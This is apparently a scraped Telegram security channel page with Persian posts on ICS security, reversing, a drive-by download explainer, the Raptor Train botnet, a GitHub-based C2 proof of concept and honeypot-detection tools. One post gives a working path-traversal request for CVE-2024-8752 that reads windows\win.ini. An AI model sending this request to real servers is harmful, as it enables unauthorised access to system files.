P.F.K Security – Telegram
P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
من Beckhoff CX9001 ICS شما را با ابزارهای منبع باز در 68 ثانیه امن می کنم!

#ICS
@PfkSecurity
علاقه مند به بحث Ics/scada Security هستید؟
Anonymous Poll
86%
بله
14%
خیر
Reversing VMCrack


مستندسازی فرآیند مهندسی معکوس و غیر مجازی کردن یک باینری محافظت شده با مبهم سازی مجازی سازی و تکنیک های مختلف anti-debugging

https://blog.deobfuscate.io/reversing-vmcrack

@PfkSecurity
CVE-2024-8752

GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1

#exploit #poc
@PfkSecurity
💡واژه نامه کلاهبردار تلگرام

یادم نیست چطور با این مورد برخورد کردم اما چند وقت پیش آن را ذخیره کردم. 278 اصطلاح مختلف مربوط به کلاهبرداری. اعتبار در پایین برگه آنها است.

https://docs.google.com/spreadsheets/d/1-ICFqnnm0DryaVfCdp7NwleGG03pJorT63bEMPBmji8/htmlview#

@PfkSecurity
💡How A Drive By Download Works

در مرحله اول: مهاجم از یک وب سایت موجود و قانونی سوء استفاده یا اکسپلویت می کند.

در مرحله دوم : کاربر به وب سایت در معرض خطر مرور می کند.

در مرحله سوم : اکسپلویت جاوا مخفی، پیلود مخرب را دانلود می کند و آن را بی صدا اجرا می کند.

در مرحله چهارم : تروجان دسترسی از راه دور نصب شده است، reverse shell  را به مهاجم باز می کند .

در مرحله پنجم : مهاجم کنترل از راه دور را بر روی کامپیوتر کاربر به دست می آورد ‌.

در مرحله ششم :مهاجم از گذرواژه‌های جمع‌آوری‌شده برای انتقال داده‌های جانبی و مرحله‌ای در وب‌سایت شرکت در دسترس خارجی استفاده می‌کند .

در مرحله هفتم :مهاجم داده های مرحله بندی شده را از وب سایت شرکت قربانی بازیابی می کند.

@PfkSecurity
خبر جان باختن ۵۱ کارگر معدن طبس قلب همه را به درد آورد. 

به خانواده‌های عزیزانی که عزیزانشان را در این حادثه از دست دادند، تسلیت می‌گوییم. امیدواریم روزی شاهد باشیم که چنین اتفاقات تلخی تکرار نشود.
دستگاه‌های SOHO و IoT، از جمله مودم‌ها، روترها، دوربین‌های IP، دستگاه‌های NVR/DVR و دستگاه‌های NAS آلوده به بات‌نت Raptor Train

250k+ دستگاه از فروشندگان بسیاری (Mikrotik، Zyxel، Hikvision و غیره)

https://blog.lumen.com/derailing-the-raptor-train/

@PfkSecurity
Media is too big
VIEW IN TELEGRAM
Windows Malware using Github as C2 (Command and Control)

GithubC2

اثبات ساده کد مفهومی در سی شارپ برای ایجاد یک برنامه ساده ویندوزی که از مخزن Github و APIها به عنوان یک Command and Control channel (C2) استفاده می کند.

https://github.com/gemini-security/GithubC2

@PfkSecurity
آزمایشگاه دور زدن AV/EDR کوچک برای اهداف آموزشی و یادگیری

https://github.com/Xacone/BestEdrOfTheMarket#


تکنیک های دفاعی ⚔️

چند سطح API Hooking
SSN Hooking/Crushing
IAT Hooking
Shellcode Injection Detection

@pfksecurity
NetGuard
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامه‌ها و آدرس‌ها می‌توانند به‌صورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity
تشخیص Honeypots

الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالب‌های Nuclei برای شناسایی چندین هانی‌پات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity